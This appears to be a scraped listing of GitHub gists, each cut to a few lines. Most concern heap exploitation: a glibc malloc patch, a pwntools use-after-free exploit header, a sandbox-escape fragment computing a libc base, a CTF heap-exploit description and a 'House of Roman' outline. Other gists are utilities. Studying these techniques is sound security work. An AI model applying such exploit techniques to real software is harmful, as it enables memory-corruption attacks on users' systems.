--- a/malloc/malloc.c
+++ b/malloc/malloc.c
@@ -4281,6 +4281,8 @@ _int_free (mstate av, mchunkptr p, int have_lock)
prevsize = prev_size (p);
size += prevsize;
p = chunk_at_offset(p, -((long) prevsize));
+ if (__glibc_unlikely (chunksize(p) != prevsize))
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#include <stdio.h> | |
#include <stdlib.h> | |
#define chunksize 0x8 | |
#define fakesize 0x20 | |
#define SIZE_SZ (sizeof(size_t)) | |
#define MALLOC_ALIGN_MASK (2*SIZE_SZ - 1) | |
#define MIN_CHUNK_SIZE 24 /* 64 bit system */ | |
//#define MIN_CHUNK_SIZE 12 /* 32 bit system */ |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env python | |
#-*- coding: utf-8 -*- | |
from pwn import * | |
import re | |
import sys | |
import string | |
import itertools | |
# UAF in IndexCursor |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# import Collection | |
bytearray = ().__class__.__base__.__subclasses__()[5] | |
def p64(addr): | |
x = '{0:016x}'.format(addr) | |
return bytearray.fromhex(x)[::-1] | |
b = Collection.Collection({'1':0x1337}) | |
libc_base = id(b) + 0xe27198 - 0x13e0dd0 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env python2 | |
# -*- coding: utf-8 -*- | |
# The 300 challenge was a heap challenge that allowed you to make allocations of size 0x300. | |
# You could free allocations and read/write to them even after they got freed. | |
# The tricky part about the challenge was that you don't control the size and can't for example use the usual fastbin techniques. | |
# This exploit overwrites the check_action variable so that the libc doesn't abort on errors anymore. | |
# Afterwards we can get a write-what-where primitive using unsafe unlink. |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
'''checkaslr.py: Check for files that opt into ASLR with /DYNAMICBASE, | |
but do not have a relocation table to allow ASLR to function. | |
usage: checkaslr.py <dir> | |
ex: checkaslr.py "C:\Program Files\" | |
requires: pefile <https://github.com/erocarrera/pefile>, which should be | |
installable via: pip install pefile | |
''' |
- Disclamair
- House Of Roman
------> 2.1 Assumptions
------> 2.2 Protections
------> 2.3 Quick Walkthrough
------> 2.4 Setting the FD to malloc_hook
------> 2.5 Fixing the 0x71 freelist
------> 2.6 Unsorted Bin attack on malloc_hook
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
obj-m += afw.o | |
afw-objs := afw_main.o locate_sct.o ttgl.o | |
ccflags-y := -std=gnu99 -O2 | |
all: | |
make -C /lib/modules/$(shell uname -r)/build M=$(PWD) modules | |
clean: | |
make -C /lib/modules/$(shell uname -r)/build M=$(PWD) clean |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# taken from http://www.piware.de/2011/01/creating-an-https-server-in-python/ | |
# generate server.xml with the following command: | |
# openssl req -new -x509 -keyout server.pem -out server.pem -days 365 -nodes | |
# run as follows: | |
# python simple-https-server.py | |
# then in your browser, visit: | |
# https://localhost:4443 | |
import BaseHTTPServer, SimpleHTTPServer | |
import ssl |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env python | |
# encoding: utf-8 | |
import tweepy #https://github.com/tweepy/tweepy | |
import csv | |
#Twitter API credentials | |
consumer_key = "" | |
consumer_secret = "" | |
access_key = "" |